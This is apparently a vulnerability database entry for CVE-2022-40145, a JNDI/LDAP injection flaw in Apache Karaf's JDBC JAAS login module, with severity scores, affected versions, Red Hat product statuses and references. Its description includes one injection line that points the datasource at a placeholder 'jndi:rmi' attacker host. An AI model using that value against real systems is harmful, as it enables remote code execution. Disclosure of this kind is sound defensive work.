Apache Karaf: JDBC JAAS LDAP injection
Published Dec 21, 2022
9.8
CRITICALCVSS 3.1
EPSS 2.50%
Description
This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.
The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup.
This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7.
We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8
Affected products
-
Affected
- ≥ 0, < 4.3.8
- ≥ 4.4.0, < 4.4.2
Default status is the baseline for the product. Each version can override it (patched versions can be marked unaffected).
| Vendor | Product | Default status | Versions |
|---|---|---|---|
| Apache Software Foundation | Apache Karaf | unaffected | Affected
|
No data.
Red Hat Decision Manager 7
Karaf
Not affected
Red Hat Fuse 7
Karaf
Not affected
Red Hat JBoss A-MQ 6
karaf
Out of support scope
Red Hat JBoss Data Grid 7
karaf
Out of support scope
Red Hat JBoss Fuse 6
Karaf
Out of support scope
Red Hat Process Automation 7
karaf
Not affected
| Product | Package | State | Advisory |
|---|---|---|---|
| Red Hat Decision Manager 7 | Karaf | Not affected | n/a |
| Red Hat Fuse 7 | Karaf | Not affected | n/a |
| Red Hat JBoss A-MQ 6 | karaf | Out of support scope | n/a |
| Red Hat JBoss Data Grid 7 | karaf | Out of support scope | n/a |
| Red Hat JBoss Fuse 6 | Karaf | Out of support scope | n/a |
| Red Hat Process Automation 7 | karaf | Not affected | n/a |
No package ranges for this CVE.
Remediation
Red Hat statement
This attack requires previous control of the LDAP target server in order to obtain access and perform code execution. Considering the pre-requisites for this vulnerability to be exploited, the impact is Important and not Critical.
Red Hat mitigation
No mitigation is currently available.
References (11)
- https://access.redhat.com/security/cve/CVE-2022-40145 Vendor Advisory
- https://bugzilla.redhat.com/show_bug.cgi?id=2257304 Issue Tracking
- https://euvd.enisa.europa.eu/vulnerability/EUVD-2022-7591 Advisory
- https://gitbox.apache.org/repos/asf?p=karaf.git;h=2a933445d1
- https://gitbox.apache.org/repos/asf?p=karaf.git;h=3819f48341
- https://github.com/advisories/GHSA-c2p4-8mvv-rwmv Advisory
- https://github.com/apache/karaf/pull/1632
- https://issues.apache.org/jira/browse/KARAF-7568
- https://karaf.apache.org/security/cve-2022-40145.txt vendor-advisoryVendor Advisory
- https://nvd.nist.gov/vuln/detail/CVE-2022-40145
- https://www.cve.org/CVERecord?id=CVE-2022-40145
Change history (0)
No recorded changes yet.
CVE.org / MITRE
CISA Vulnrichment
GitHub